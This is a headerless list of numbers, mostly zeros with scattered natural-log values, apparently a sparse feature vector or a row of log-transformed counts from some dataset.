0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 4.624972813284271, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8501476017100584, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 7.652696215340966, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.160336650881089, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.2626798770413155, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.258096538021482, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.567740402508133, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.969813299576001, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.961361141082371, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 